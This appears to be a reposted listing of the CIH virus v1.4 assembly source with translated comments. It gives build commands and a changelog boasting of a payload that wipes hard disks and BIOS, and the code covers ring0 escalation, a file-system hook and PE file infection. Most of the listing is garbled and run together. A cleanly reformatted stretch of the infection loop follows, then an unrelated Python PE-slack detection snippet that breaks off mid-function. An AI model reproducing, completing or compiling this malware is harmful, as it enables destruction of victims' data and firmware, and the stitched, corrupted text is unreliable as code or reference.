CIH virus version 1.4 source listing with Chinese comments (translated to English)

xiaoxiao2021-03-06  61

;****************************************************************
;* The Virus Program Information                                *
;****************************************************************
;* Designer          : CIH      Source : TTIT of Tatung in Taiwan*
;* Create Date       : 04/26/1998    Now Version : 1.4          *
;* Modification Time : 05/31/1998                               *
;* Turbo Assembler Version 4.0 : tasm /m cih                    *
;* Turbo Link Version 3.01     : tlink /3 /t cih, cih.exe       *
;*   (translator's note: compile and link with Turbo Assembler; *
;*    the tools can be found in Borland C++ 3.1)                *
;*==============================================================*
;* Modification History                                         *
;*==============================================================*
;* v1.0  1. Create the Virus Program.                           *
;*       2. The Virus Modifies IDT to Get Ring0 Privilege.      *
;* 04/26/1998                                                   *
;*       3. Virus Code doesn't Reload into System.              *
;*       4. Call IFSMgr_InstallFileSystemApiHook to Hook File   *
;*          System.                                             *
;*       5. Modifies Entry Point of                             *
;*          IFSMgr_InstallFileSystemApiHook.                    *
;*       6. When System Opens Existing PE File, the File will   *
;*          be Infected, and the File doesn't be Reinfected.    *
;*       7. It is also Infected, even the File is Read-Only.    *
;*       8. When the File is Infected, the Modification Date    *
;*          and Time of the File also don't be Changed.         *
;*       9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not *
;*          Call Previous FileSystemApiHook, it will Call the   *
;*          Function that the IFS Manager Would Normally Call   *
;*          to Implement this Particular I/O Request.           *
;*      10. The Virus Size is only 656 Bytes.                   *
;*==============================================================*
;* v1.1  1. (text garbled in this copy) ... Increase it's       *
;*          size ... ^__^                                       *
;* 05/15/1998                                                   *
;*       2. Hook and Modify Structured Exception Handling.      *
;*          When Exception Error Occurs, Our System should be   *
;*          in Windows NT. So My Cute Virus will not Continue   *
;*          to Run, It will Jump to Original Application to Run.*
;*       3. Use Better Algorithm, Reduce Virus Code Size.       *
;*       4. The Virus "Basic" Size is only 796 Bytes.           *
;*==============================================================*
;* v1.2  1. Kill All HardDisk, and BIOS ... Super ... Killer ...*
;*       2. Modify the Bug of v1.1.                             *
;* 05/21/1998                                                   *
;*       3. The Virus "Basic" Size is 1003 Bytes.               *
;*==============================================================*
;* v1.3  1. Modify the Bug that WinZip Self-Extractor Occurs    *
;*          Error. So when Open WinZip Self-Extractor ==>       *
;*          Don't Infect it.                                    *
;* 05/24/1998                                                   *
;*       2. The Virus "Basic" Size is 1010 Bytes.               *
;*==============================================================*
;* v1.4  1. Full Modify the Bug: WinZip Self-Extractor Occurs   *
;*          Error.                                              *
;* 05/31/1998                                                   *
;*       3. Modify Virus Version Copyright.                     *
;*       4. The Virus "Basic" Size is 1019 Bytes.               *
;****************************************************************

.586P                   ; 586 protected-mode assembly

;****************************************************************
;* Original PE Executable File (Don't Modify this Section)      *
;****************************************************************
OriginalAppEXE  SEGMENT
FileHeader:

Compile the connected PE format executable file header DB 04DH, 05AH, 090H, 000H, 003H, 000H, 000H, 0FFH, 0FFH, 000H, 000H DB 0B8H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H DB 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 080H, 000H, 000H, 000H DB 00, 01FH, 0BAH, 00Eh, 000H, 0B4H, 009H, 0CDH DB 021H, 0B8H, 001H, 04CH, 0CDH, 021H, 054H, 068H DB 069H, 073H, 020H, 070H, 072H, 06FH, 067H, 072H DB 061H, 06DH, 020H, 063H, 061H, 06EH, 06EH, 06FH DB 074H, 020H, 062H, 065H, 020H, 072H, 075H, 06EH DB 020H, 069H, 06EH, 020H, 044H, 04FH, 053H, 020H DB 06DH, 06FH, 064H, 065H, 02EH, 00DH, 00DH, 065H, 02EH, 00DH, 00DH, 065H, 02EH, 00DH, 00Dh, 00AH DB 024H, 000H, 000H DB 050H, 045H, 000H, 000H, 04CH, 001H, 001H, 000H DB 0F1H, 068H, 020H, 035H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 0E0H, 000H, 001H, 005H, 000H, 000H 010h, 000H, 000H, 000H, 000H, 000H, 000H DB 010H, 010H, 000H, 000H, 010H, 000H, 000H DB 000H, 020H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H , 040H, 000H DB 000H, 010H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 004H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H 000H DB 000H, 020H, 000H, 000H DB 000H, 000H, 000H, 002H, 000H, 000H, 000H, 000H, 010H, 000H, 000H, 000H, 010H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 010H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H,

000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 02EH, 074H, 065H, 078H, 074H, 000H, 000H, 000H, 010H, 000H, 000H, 010H, 000H, 000H, 002H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 020H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H 000H DB 000H, 000H, 000H, 000H DB 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DB 0C3H, 000H, 000H, 000H, 000H, 000H, 000H, 000H DD 00000000h,

Virussize OriginalAppexe Ends; ***************************************************** *****************************; * My Virus game *; ************* *********************************************************** ************; **************************************************** ************* * CONSTANT Define *; ********************** ******************************************* TRUE = 1 false = 0 debug = false majorvirusversion = 1; main version number MinorVirusVersion = 4; Minor version number VirusVersion = MajorVirusVersion * 10h MinorVirusVersion; synthetic version iF dEBUG; whether debugging FirstKillHardDiskNumber = 81h; kill second hard disk "d:" HookExceptionNumber = 05h; No. 5 using the interrupt ELSE FirstKillHardDiskNumber = 80h; kill the first hard disk "C:" hookExceptionNumber = 03h; use 3 interrupt Endif FileNameBuffersize = 7fh; ************************* *********************; ********************* ************************************** Virusgame Segment Assume Cs: Virusgame, DS: Virusgame SS: Virusgame Assute ES: Virusgame, FS: Virusgame, GS: Virusgame; ********************************************** ********************** * Ring3 virus game initial program *; ************************************************** **************** MYVIRUSSTART: PUSH EBP; ************************************************** ********; * let's modify structured exception *; * handing, prevent exception error *; * ioccurrence, especially in nt. *; *************** ********************* Lea EAX, [ESP-04H * 2] xor EBX, EBX XCHG EAX, FS: [EBX] Call @ 0 @ 0: POP EBX; get the program start offset?; use this offset relative offset to get absolute addresses (the virus program is used in large quantity) Lea ECX,

STOPTORUNVIRUSCODE- @ 0 [EBX] Push ECX PUSH EAX; *************************; *'S modify *; * idt (Interrupt Descriptor Table) *; * to get ring0 privilege ... *; ********************************** *********** PUSH EAX; SIDT [ESP-02H]; GET IDT BASE Address?; Get the base address of the interrupt descriptor table to EBX POP EBX; add EBX, hookExceptionNumber * 08H 04H; ZF = 0; calculate the base address to EBX CLI to use the interrupt; MOV EBP, [EBX]; GET EXCEPTION BASE MOV BP, "ENTRY POINT?; Achieve interrupt base address to EBP LEA ESI, MyExceptionHook- @ 1 [ECX] Push ESI?; ESI is the viral interrupt routine address MOV [EBX-04H], Si; SHR ESI, 16; Modify Exception MOV [EBX 02H], Si; Entry Point Address Modify the interrupt base address to point to the viral interrupt routine POP ESI; ******************************************** *; * Generate exception to get ring0 *; ********************************* INT hookexceptionNumber; GENERATEEXCEPTION; into the interrupted method into the 0th ReturnadDressofendexception = $; ******************************************************** ; * Merge All Virus code section *; ********************************** PUSH ESI MOV ESI Eax; ESI points to the virus to the beginning of LoopofmergeallViruscodeec TION: MOV ECX, [EAX-04H] REP MOVSB; Copy Virus Code to Allocated System Memory Adjust Sub Eax, 08h MOV ESI, [EAX] or ESI, ESI JZ QuitloopofmergeAllVirusCodeSecion; zf = 1; Copy JMP loopofmergeAllViruscodeSecion; Copy the next paragraph QuitloopofmerGeallviruscodese: Pop ESI; *************************; * Generate Exception Again *; *********************************** INT hookExceptionNumber; generateException AGA; again enter level 0 ; ***************************; * let's rest's restore *; * structured exception handing *; ********************************************** READYRESTORESE: STI; open Interrupt XOR EBX, EBX JMP Restorese; ***********************************; * WHEN Exception Error Occurs,

*; *; * SO my Cute Virus Will Not *; * Continue To Run, IT JMups to *; * Original Application To Run. *; ********** ************************* StoptorUnviruscode: @ 1 = Stoptorunviruscode XOR EBX, EBX MOV EAX, FS: [EBX] MOV ESP, [EAX ] Restorese: POP DWORD PTR FS: [EBX] POP ​​EAX; ****************************************************** *; * Returnal app to execute *; ******************************************************* PUP EBP PUSH 00401000H; Push ORIGINALADDRESSOFENTRYPOINT = $-4; app entry point to stack; put the original program start address stack return; return to original app entry point; return to the beginning of the original program as a child program; **** *********************************************************** ***; * ring0 virus game game initial program *; ************************************************** **************************** MYEXCEPTIONHOOK: @ 2 = MyExceptionHook JZ InstallmyFileSystemapiHook; if the virus code has been copied; go to the program to install the file system hook; ***** ********************************; * Do My Virus EXIST IN System!? 
*; ***** ******************************* MOV ECX, DR0; see if DR0 is set (DR0 is a virus resident mark) Jecxz AllocateSystemMemoryPage; no setup, allocate system memory add dword ptr [ESP], readyrestore-returnaddressofendexception; ****************************** ***************; * RETURN TO RING3 Initial Program *; ***************************************** ************ EXITRING0INIT: MOV [EBX-04H], BP; SHR EBP, 16; Restore Exception MOV [EBX 02H], BP;; Restore the original interrupt base IRETD; interrupt return ; ************************************; * Allocate SystemMemory Page to use *; *** ******************************************** AllocateSystemMemoryPage: MOV DR0, EBX; SET THE MARK OF MY Virus Exist in System Set DR0, it is a sign of the virus resides, PUSH 00000000FH; Push Ecx; Push 0ffffffh; Push ECX; Call Method Ulong Extern _PageAllocate (Ulong Npages, Ulong Ptype, Ulong VM, Ulong Alignmask, ulong minphys,

ULONG maxPhys, ULONG * PhysAddr,; ULONG flags); push ecx; push ecx; push 000000001h; push 000000002h; int 20h; VMMCALL _PageAllocate; VXD call _PageAllocate = $; dd 00010053h; Use EAX, ECX, EDX, and flags add ESP, 08H * 04H; Recovery Stack Pointer Xchg EDI, ED; EDI = SystemMemory Start Address; EDI points to allocated system memory first LEA EAX, myvirusstart- @ 2 [ESI]; ESi] To the virus beginning with IRetd; return to ring3 Initial program; exit interruption, back to level 3 (return "Merge All Virus Code Section"); ************************************ ********; * Install my file system API hook *; ***************************************** ***** InstallMyFileSystemApiHook: lea eax, FileSystemApiHook- @ 6 [edi]; points to the file system hooks first address push eax; int 20h; VXDCALL IFSMgr_InstallFileSystemApiHook IFSMgr_InstallFileSystemApiHook = $; dd 00400067h; Use EAX, ECX, EDX, and flags; after the call becomes call [IFSMgr_InstallFileSystemApiHook] mov dr0, eax; save OldFileSystemApiHook address; save the original file system access into the first hooks DR0 (modified call return value is the previous value chain) pop eax; EAX = FileSystemApiHook address; save Old IFSMGR_INSTALLESYSTEMAPIHOK Entry Point Mov ECX, IFS Mgr_InstallFileSystemApiHook- @ 2 [esi] mov edx, [ecx]; edx function as IFSMgr_InstallFileSystemApiHook address mov OldInstallFileSystemApiHook- @ 3 [eax], edx;? Preservation; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook- @ 3 [eax] mov [ ECX],

EAX?; Set the address called the new IFSMGR_INSTALLSYSTEMAPIHOOK function; make the INSTALLSYSTEMAPIHOK CLI JMP EXITRING0INIT?; exit 0 (INT 3 or INT 5); *************************** *************************************; * Code size of merge virus code section *; * *********************************************************** ****** CODESIZEOFMERGEVIRUSCODESECTION = offset $; ************************************************** *****************; * IFSMGR_INSTALLSYSTEMAPIHOK *; *********************************** **************************************** InstallFileSystemapiHook:; new IFSMGR_INSTALLESYSTEMAPIHOK function calls push ebx call @ 4; @ 4:; pop ebx ; mov ebx, offset FileSystemApiHook; obtain the current instruction address offset add ebx, FileSystemApiHook- @ 4; the difference plus an offset offset = FileSystemApiHook push ebx int 20h; VXDCALL IFSMgr_RemoveFileSystemApiHook; VXD removed call directed hook IFSMgr_RemoveFileSystemApiHook FileSystemApiHook = $ DD 00400068H; Use Eax, ECX, EDX, And Flags; call number Pop Eax; call original ifsmgr_installfilesystemapihook; to link client FileSystemapihook Push DWORD PTR [ESP 8] Call OldInstallFile SystemApiHook- @ 3 [ebx]; call the original function to set the hook IFSMgr_InstallFileSystemApiHook pop ecx push eax; Call Original IFSMgr_InstallFileSystemApiHook; to Link My FileSystemApiHook push ebx call OldInstallFileSystemApiHook- @ 3 [ebx]; call the original function to set the hook IFSMgr_InstallFileSystemApiHook pop ecx mov dr0 ,

Eax; Adjust OldFileSystemapiHook Address; Adjust the original address POP EBX RET; ********************************************* **************; * static data *; ********************** ************************************ OLDINSTALLSYSTEMAPIHOK DD?; The original InstallFileSystemapiHook called the address; *** *********************************************************** ****; * ifsmgr_filesystemHOK *; ************************************************************* ***************; ***************************************** ****; * ifsmgr_filesystemhook entry point *; ******************************************** FILESYSTEMAPIHOKIOK: Installed file system hook @ 3 = filesystemapihook pushad; save register (20H long) call @ 5; @ 5:; Pop ESI; MOV ESI, OFFSET; ESI is the offset of the current instruction Add ESI, VirusGameDataStartaddress- @ 5; ESI's offset of FileSystemapiHook plus the deviation of VirusGameDataStartAddress = VirusGameDataStartAddress offset; ************************************ ********; * is onbusy !? *; ***************************************** *** TEST BYTE PTR (Onbusy- @ 6) [ESI], 01H; if (Onbusy); Test "Busy" Sign JNZ Pifunc; Goto Pifunc; "Busy" Go to PIFSFUN C; **************************; * is openfile!? *; *** *********************************; if (notopenfile); Goto Prevhook Lea EBX, [ESP 20H 04h 04h]; ebx address FunctionNum; a file system hook call the following format; FileSystemApiHookFunction (pIFSFunc FSDFnAddr, int FunctionNum, int Drive, int ResourceFlags, int CodePage, pioreq pir); co superscript 2 cmp dword ptr [ebx], 00000024H; Test if the call is to open the file; #define ifsfn_open 36 jne prevhook defined in the IFS.H of DDK; not jump to the previous file hook; ************ ***************; * enable onbusy *; ******************** ***************** Inc Byte Ptr (Onbusy- @ 6) [ESI]; Enable Onbusy; Setting "Busy" flag "Bus"; ****** *********************** * GET FilePath's Drivenumber,

*; * Filenamebuffer. *; *********************************************************************************************************************************************************************************************************** **; *; * DRIVENAME IS 'C:'. *; **************************** **********; MOV ESI, OFFSET FileNameBuffer Add ESI, FileNameBuffer- @ 6; ESI points to FileNameBuffer Push ESI; save MOV Al, [EBX 04H]; EBX 4 is the address of INT Drive CMP Al, 0FFH; Whether the Universal Naming Conventions address JE CallUnitobcspath is turned to ADD Al, 40H MOV AH, ':' MOV [ESI], ESI; processing into "x:" in the form of "x:" Inc ESI; * *************************; * Unitobcspath *; ********* ****************************; * this service controls *; * a canonicalized unicode pathname *; converts the CANONICALIZED Unicode characters to ordinary BCS character set; * to a normal pathname in the *; * specified bcs character set. *; ************************************** *********; calling method UniToBCSPath (unsigned char * pBCSPath, ParsedPath * pUniPath, unsigned int maxLength, int charSet) CallUniToBCSPath: push 00000000h; charset push FileNameBufferSize; character length mov ebx, [ebx 10h] MOV Eax, [EBX 0CH] Add Eax, 04H PUSH EAX; UNI Character, Push ESI; BCS Character, INT 20H; vxdcall unitobcspath; call unitobcspath unitobcspath = $ dd 00400041h; call ID add ESP, 04H * 04H; ********** *****************; * IS filename '.exe'!? *; ********** **************************; CMP [ESI EAX-04H], '.exe' CMP [ESI EAX-04H], ' EXE. '; Test is * .exe (executable) file POP ESI JNE DisableOnbusy if debug; *********************************** *********; * ONLY for debug *; ***************************************** ***; CMP [ESI EAX-06H], 'Fuck' CMP [ESI EAX-06H],

The test is "fuck.exe" JNE disableonbusy endif; ******************************** ********; * is open existing file !? *; **************************************** *****; if (notopenexistingfile; goto disableonbusy cmp word PTR [EBX 18H], 01H; Test Whether to open JNE disableonbusy; ****************** *****************; * Get Attributes of the file *; ******************************** ************* mov ax, 4300h; IFSMgr_Ring0_FileIO obtained file attribute number (R0_FILEATTRIBUTES / GET_ATTRIBUTES) int 20h; VXDCall IFSMgr_Ring0_FileIO; IFSMgr_Ring0_FileIO obtained calling function the file attributes IFSMgr_Ring0_FileIO = $ dd 00400032h; call No. JC disableonbusy; fail? Push ECX; *************************; * Get IFSMGR_RING0_FILEIO Address *; ********************************************* MOV EDI, DWORD PTR (IFSMGR_Ring0_Fileio- @ 7) [ESI] MOV EDI, [EDI]; get the address called IFSMGR_RING0_FILEIO; ***************************************** *****; * is read-only file!? *; ***************************************** *** TEST CL, 01H JZ OpenFile; Test is a read-only file; ******************************* ****; * Modify Read-Only File to Write *; ******************************************* MOV AX, 4301H; ifsmgr_ring0_fileio gets the file attribute number (r0_filettributes / set_attributes) xor ECX, ECX Call Edi; vxdcall ifsmgr_ring0_fileio; calls ifsmgr_ring0_fileio to change the file attribute function, make the file can be written; ************* **************; * Open file *; ********************* **************** OpenFile: XOR EAX, EAX MOV AH, 0D5H; IFSMGR_RING0_FILEIO Open File function number (r0_opencreatfile or ro_opencreat_in_context) xor ECX, ECX; file attribute xor Edx, EDX INC EDX MOV EBX, EDX INC EBX; ESI is the first site of the file name Call Edi; vxdcall ifsmgr_ring0_fileio; calls ifsmgr_ring0_fileio Open file function XCHG EBX, EAX; MOV EBX,

FileHandle; save the file handle in EBX; *************************; * NEED TO RESTORE *; * Attributes of the file!? *; ************************************************ ECX PUSHF TEST CL, 01H jz isopenfileok; Does it need to recover file properties (there is no need to recover if write attributes); ************************ ************; * restore attributes of the file *; *************************************** ******** MOV AX, 4301H; IFSMGR_RING0_FILEIO's acquisition file attribute number (R0_FileAttributes / set_attributes) Call Edi; vxdcall ifsmgr_ring0_fileio; restore file properties; *************** *********************; * IS open file ok!? *; ******************* ***************** ISOpenFileok: POPF JC Disableonbusy; Open is successful?; ********************* ***************; * Open file already succeed. ^ __ ^ *; ********************** *************** PUSH ESI; PUSH FileNameBuffer Address to Stack; put the file name data area first stop Pushf; Now cf = 0, Push Flag to Stack; Save flag ADD ESI , DataBuffer- @ 7; MOV ESI, Offset DataBuffer; ESI points to the first place in the data area; *************************; * Get OffsettonewHeader *; ************************* X, EAX MOV AH, 0D6H; IFSMGR_RING0_FILEIO's read file function number (r0_readfile); for doing minimal viruscode's length,; I save eBp. MOV EBP, EAX PUSH 00000004H; Read 4 bytes POP ECX PUSH 0000003CH; read Take a DOS file header offset Windows file header head offset POP EDX CALL EDI; vxdcall ifsmgr_ring0_fileio; read file to ESI MOV EDX, [ESI]; Windows file header head offset to EDX; ****** ************; * GET 'PE / 0' Signature *; * of imagefileHeader, and *; * inflected mark. *; ***** ********************* DEC EDX MOV EAX,

EBP; function number Call Edi; vxdcall ifsmgr_ring0_fileio; read file to ESI; ***************; * is pe!? *; **************************; * is the file *; * already infected!? *; ********* ******************; * Winzip self-extractor *; * doesn't has infected *; * mark Because my virus *; * doessn't infect it. *; **************************; CMP [ESI], '/ 0pe / 0' CMP DWORD PTR [ESI],

00455000H; Judging whether it is a PE file (flag "PE / 0/0") JNE closefile; does not turn off the file; *********************** ***********; * the file is ^ o ^ *; * PE (portable executable) indeed. *; ****************** ******************; * the file isn't also infected. *; ******************* ****************; **************************************** ******; * START to INFECT THE FILE *; **************************************************** **; * registers use status now: *; * *; * eAX = 04h *; * ebx = file handle *; * ECX = 04h *; * Edx = 'pe / 0/0' signature of *; * imagefileheader Pointer's *; * Esi = database *; * EDI = IFSMGR_RING0_FILEIO Address *; * EBP = D600H ==> read data in file *; ********** ***************************; * stack dump: *; * *; * esp => --------- ---------------- *; * | eflag (cf = 0) | *; * -------------------- ----- *; * | filenamebufferpointer | *; * ------------------------ *; * | EDI | *; * ----------------------- *; * | ESI | *; * ------------------ ------- *; * | EBP | *; * ----------------------- *; * | ESP | *; * ----------- -------------- *; * | EBX | *; * ------------------------- *; * | EDX | *; * ------------------------- *; * | ECX | *; * --------- ---------------- *; * | EAX | *; * ------------------------- *; * |------------------------ *; ********************* ************************ PUSH EBX; Save File Handle; Save File Handle Push 00h; Set ViruscodeSectionTableEndmark; ********** ****************; * let's set the *; * virus' infected mark *; ******************* ******** PUSH 01H; Size Push EDX; POINTER OF FILE; EDX points to PE file header offset 00h push edi; address of buffer; EDI is IFS

Mgr_ring0_fileio's address (original note incorrectly); ****************; * save esp register *; ****** ********************* MOV DR1, ESP; *********************** ***; * newdressofentryPoint *; * (only first set size) *; ********************************** Push Eax; Size; ****************; * Let's read *; * image header in file *; ***** ********************** MOV EAX, EBP MOV CL, SIZEOFIMAGEHEADERTOREAD; Word Numberofsections Add Edx, 07h; Move EDX To Numberofsections PE file head 07h is Numberofsections Call Edi; vxdcall ifsmgr_ring0_fileio; read NumberOfsections to ESI; ****************** *******; * let's set the *; * newdressofentrypoint *; * (set pointer of file, *; * address of buffer) *; *************** *********** Lea EAX, (AddressofentryPoint- @ 8) [EDX] Push Eax; Pointer Of File Lea Eax, (Newaddressofentrypoint- @ 8) [ESI] Push Eax; address of buffer; ** ****************; * Move Edx to the start *; * of sectionTable in file *; ***** ******************************* MOVZX EAX, Word Ptr (SizeOfoptionalHeader- @ 8) [ESI] Lea EDX, [EAX EDX 12H]; EDX is SectionTable Offset; **************************; * let's get *; * total size of sections *; ****** ********************* MOV AL, SIZEOFSCETABLE; ScetionTable size (bytes); I Assume Numberofsections <= 0ffh MOV CL, (NumberOfsections- @ 8) [ESI] Mul CL; Each block table is multiplied by block = block size; ********************* ****; * let's set section table *; ****************; Move Esi to the Start of SectionTable Lea ESI, (StartofsectionTable- @ 8) [ESI]; ESI points to block table premiere (in the viral dynamic data area) Push Eax; size; block size Push EDX; POINTER OF FILE; EDX is the offset of SectionTable Push ESI; Address of Buffer ;; *******************

*******; * the code size of merge *; * Virus code section and *; * total size of virus *; * code section table must *; * beall or equal the *; * unused space size of *; ********************************************* Inc ECX PUSH ECX; Save Numberofsections 1 shl ECX, 03H; * 8 Push ECX; Save TotalsizeOfviruscodeSECTIONTABLE; Reserved Virus Block Table Space Add ECX, EAX Add ECX, EDX; ECX File Body Off Sub ECX, (SizeOfheaders- @ 9) [ESI] NOT ECX INC ECX; For file header size-body offset = unused space; SAVE MY Virus First section; Size of Following Section Table ...; (Not Include The size of virus code section) Push ECX XCHG ECX, EAX; ECX = SIZE OF Section Table; ECX is a block size; Save Original Address of Entry Point Mov Eax, (AddressofentryPoint- @ 9) [ESI]; ENT RVA Address Add Eax, (ImageBase- @ 9) [ESI]; load base MOV (OriginalAddressofentrypoint- @ 9) [ESI], EAX; Save the actual entrance address CMP Word PTR [ESP], Small CodesizeOfmergeViruscodeSECTION; unused space and virus first size compare jl onlysetinfectedmark; smaller than the infection mark ; ***************************; * Read All Section Tables *; ************************** MOV EAX, EBP; read function number Call Edi; vxdcall ifsmgr_ring0_fileio; reading block table to ESI (@ 9); **************************; * FULL Modify the bug: *; * Winzip self-extractor *; * Occurs error ... *; ****************; * So when opens *; * winzip self-extractor, *; * Virus doesn't infect it. *; **************************; * first, virus gets the *; * PointertorawData in the *; * Reads the section data, *; * and tests the string of *; * 'Winzip (r)' ... *; ********** ***************** XCHG EAX, EBP PUSH 00000004h Pop ECX; Read 4 Bytes Push Edx Mov Edx, (SizeOfScectionTable PointertorawData- @ 9) [EBX]; EDX is the first Two offset (.rdata) AD

D EDX, 12H; Plus 10H 2H (10h is "winzip ....") Call Edi; vxdcall ifsmgr_ring0_fileio; read 4 bytes to ESI; CMP [ESI], 'Nzip' CMP DWORD PTR [ESI], ' PIZN '; judgment whether it is WinZip self-extracting file JE notsetinfectedmark; if you do not set the infection flag POP EDX; EDX point to block table in the file; ***************** ********; * let's set total virus *; * code section table *; ********************************** ; EBX = My Virus First Section Code; size of Following Section table pop ebx; unused space pop edi; EDI = TotalSizeOfVirusCodeSectionTabl pop ecx; ECX = NumberOfSections 1 push edi; size add edx, ebp; ebp blocks table size push EDX; POINTER OF FILE; After the block table (first block) Add EBP, ESI; EBP points to the block table of the viral data area (first block) Push EBP; address of buffer; ******** *****************; * set the first virus *; * code section size in *; * viruscodeesetable *; ************ ************** LEA EAX, [EBP EDI-04H] MOV [EAX], EBX; setting the size of the virus code first block (unused space size) to the virus block table; **************************; * let's set my virus *; * first section code *; ********* ****************** PUSH EBX; size; the size of the virus code (unused space size) Add Edx, EDI Push EDX; POINTER OF FILE; point to block table (first block) size ?? 
= virus body (virus began) Lea EDI, (MyvirusStart- @ 9) [ESI] Push EDI; address of buffer; point to virus Divance; ****************; * let's modify the *; * addressofentrypoint to *; * my virus entry point *; ** ************************* MOV (NewaddressofentryPoint- @ 9) [ESI], EDX; save new program entry (virus body); ** ************************; * SETUP Initial Data *; *************************** ********* Lea edx, [ESI-SIZEOFSCETONTABLE]; EDX first reduced one block length to cooperate with the "bid 1" MOV EBP, OFFSET VIRUSSIZE; EBP is the virus length JMP starttowritecodetosections; * *************************; * WRITE CODE TO Sections *; *************** *********** LOOPOFWRITECODETOSECTIONS: Add Edx, SIZ

LoopOfWriteCodeToSections:
        add     edx, 28h                        ; EDX points to the next section header
        mov     ebx, (SizeOfRawData-@9)[edx]    ; EBX = SizeOfRawData (raw size) of this section
        sub     ebx, (VirtualSize-@9)[edx]      ; minus VirtualSize = unused space at the end of the section
        jbe     EndOfWriteCodeToSections        ; no slack in this section: skip it
        push    ebx                             ; Size
        sub     eax, 08h
        mov     [eax], ebx                      ; write the fragment size into the virus code section table
        mov     ebx, (PointerToRawData-@9)[edx] ; EBX = physical (file) offset of the section
        add     ebx, (VirtualSize-@9)[edx]      ; plus VirtualSize = file offset of the slack
        push    ebx                             ; Pointer of (file pointer to write at)
        push    edi                             ; Address of Buffer
        mov     ebx, (VirtualSize-@9)[edx]
        add     ebx, (VirtualAddress-@9)[edx]
        add     ebx, (ImageBase-@9)[esi]        ; EBX = address of this fragment once the image is loaded
        mov     [eax+4], ebx                    ; save it in the virus code section table
        mov     ebx, [eax]                      ; size of this section's unused space
        add     (VirtualSize-@9)[edx], ebx      ; add it to the section's VirtualSize
        ; Section Contains Initialized Data ==> 00000040h
        ; Section Can Be Read.            ==> 40000000h
        or      (Characteristics-@9)[edx], 40000040h ; section flags: readable, contains initialized data
StartToWriteCodeToSections:
        sub     ebp, ebx                        ; remaining virus size minus this fragment's size
        jbe     SetVirusCodeSectionTableEndMark ; whole virus placed: set the end mark of the table
        add     edi, ebx                        ; Move Address of Buffer: point to the next part of the virus
EndOfWriteCodeToSections:
        loop    LoopOfWriteCodeToSections

; *****************************
; * Only Set Infected Mark    *
; *****************************
OnlySetInfectedMark:
        mov     esp, dr1                        ; only set the infection mark
        jmp     WriteVirusCodeToFile            ; go write to the file being infected

; *****************************
; * Not Set Infected Mark     *
; *****************************
NotSetInfectedMark:
        add     esp, 3ch                        ; do not set the infection mark
        jmp     CloseFile                       ; go close the file

; *****************************
; * Set Virus Code            *
; * Section Table End Mark    *
; *****************************
SetVirusCodeSectionTableEndMark:
        ; Adjust Size of Virus Section Code to Correct Value
        add     [esp+08h], ebp                  ; correct the size in the last virus code section table entry
        ; Set End Mark
        xor     ebx, ebx
        mov     [eax-04h], ebx                  ; a zero entry terminates the virus code section table
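The section loop above rests on one PE fact: a section's SizeOfRawData is rounded up to FileAlignment while VirtualSize is the number of bytes actually used, so the difference is file-backed slack that the loader maps but nothing initialises, and a cavity infector can fill it without changing the file size. The Python below is an added example, not part of the CIH listing or of its commentary. It walks a PE32 section table the same way the loop does, reports the slack per section, simulates only the header bookkeeping the loop performs (VirtualSize bumped, 40000040h ORed in) and then applies a simple detection heuristic of this example's own: a code section that carries the initialized-data flag and has no slack left. The sample image is constructed inline and is header-only.

```python
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_READ = 0x40000000
CIH_OR_MASK = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ  # the 40000040h in the listing


def parse_pe32(image):
    """Return (image_base, sections) for an in-memory PE32 file. Each section dict keeps
    the header's file offset ("hdr") so the table can be rewritten in place."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
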